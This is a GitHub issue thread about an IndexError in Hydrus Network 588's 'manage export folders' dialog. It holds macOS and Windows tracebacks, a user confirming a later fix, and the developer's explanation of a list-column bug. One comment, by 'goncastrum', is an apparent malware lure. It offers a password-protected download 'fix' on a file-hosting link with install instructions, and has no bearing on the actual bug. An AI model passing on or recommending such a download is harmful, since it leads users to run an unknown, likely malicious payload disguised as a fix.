### ISSUE TITLE
IndexError when trying to manage export folders

### ISSUE THREAD

**Issue by roachcord3** [hydrusnetwork/hydrus#1588]
### Hydrus version

588

### Qt major version

Qt 6

### Operating system

macOS other (specify in comments)

### Install method

Running from source

### Install and OS comments

macOS 14.6.1

(btw you should add macOS 13 and 14 to the selection list)

### Bug description and reproduction

I have an export folder for hyextract. I wanted to update the query for it, but when I went to open the "manage export folders" dialog, I got an `IndexError` instead. This is consistent; it's impossible to manage export folders now.

I don't get this with the "manage import folders" dialog, but I don't have any import folders set up anyway.

### Log output

```text
v588, darwin, source
IndexError
tuple index out of range
Traceback (most recent call last):
  File "/Users/me/hydrus/src/hydrus/core/HydrusThreading.py", line 452, in run
    callable( *args, **kwargs )
  File "/Users/me/hydrus/src/hydrus/client/gui/ClientGUI.py", line 4208, in THREAD_do_it
    controller.CallBlockingToQt( self, qt_do_it )
  File "/Users/me/hydrus/src/hydrus/client/ClientController.py", line 482, in CallBlockingToQt
    raise e
  File "/Users/me/hydrus/src/hydrus/client/ClientController.py", line 428, in qt_code
    result = func( *args, **kwargs )
             ^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/me/hydrus/src/hydrus/client/gui/ClientGUI.py", line 4139, in qt_do_it
    panel = ClientGUIExport.EditExportFoldersPanel( dlg, export_folders )
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/me/hydrus/src/hydrus/client/gui/exporting/ClientGUIExport.py", line 77, in __init__
    self.widget().setLayout( vbox )
  File "/Users/me/hydrus/src/hydrus/client/gui/lists/ClientGUIListCtrl.py", line 142, in data
    text = self._data_to_display_tuples[ data ][ column_type ]
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^
IndexError: tuple index out of range
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by topaz-studio** [comment]
I am getting this on windows 11 client ver 588 too, two diff traceback errors when i select _file > manage import and export folders > manage export folders..._

```
v588, win32, frozen
IndexError
tuple index out of range
Traceback (most recent call last):
  File "hydrus\core\HydrusThreading.py", line 452, in run
  File "hydrus\client\gui\ClientGUI.py", line 4208, in THREAD_do_it
  File "hydrus\client\ClientController.py", line 482, in CallBlockingToQt
  File "hydrus\client\ClientController.py", line 428, in qt_code
  File "hydrus\client\gui\ClientGUI.py", line 4139, in qt_do_it
  File "hydrus\client\gui\exporting\ClientGUIExport.py", line 77, in __init__
  File "hydrus\client\gui\lists\ClientGUIListCtrl.py", line 142, in data
IndexError: tuple index out of range
```


```
v588, win32, frozen
IndexError
tuple index out of range
  File "hydrus\client\gui\lists\ClientGUIListCtrl.py", line 142, in data
```

**Comment by topaz-studio** [comment]
confirmed fixed in 391 (was indicated as fixed in 389 change notes but i skipped a few versions), topic can be closed

**Comment by hydrusnetwork** [comment]
Sorry for the trouble here and addressing it here so late. I messed up a thing in the multi-column list rewrite a few weeks ago, not accounting for something special in the export folders dialog--it is the only list in the program to have had a column removed (so far). Let me know if you have any more trouble with things!
